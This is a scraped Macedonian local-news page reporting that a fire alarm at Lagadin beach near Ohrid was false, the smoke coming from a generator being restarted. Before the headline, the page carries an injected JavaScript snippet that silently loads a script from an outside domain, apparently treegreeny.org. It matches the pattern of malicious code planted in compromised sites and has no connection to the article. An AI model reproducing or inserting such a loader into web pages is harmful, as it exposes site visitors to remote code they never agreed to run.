;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ЛАЖНО ПРИЈАВУВАЊЕ ЗА ПОЖАР ВО ПЛАЖАТА ЛАГАДИН -

ЛАЖНО ПРИЈАВУВАЊЕ ЗА ПОЖАР ВО ПЛАЖАТА ЛАГАДИН

По пријава на загрижени граѓани, утрово ВО охридската Противпожарна служба бил пријавен чад и пожар во населбата Лагадин.
Но, Откако две противпожарни возила пристигнале на пријавената локација било утрдено дека не станува збор за пожар, туку чад кој се шири при обид за активирање на агрегат за струја кој подолго време не бил користен.

1336_web-srebrno-jezero-04-foto-svetislav-mirkovic_iff

Leave a Reply

Your email address will not be published.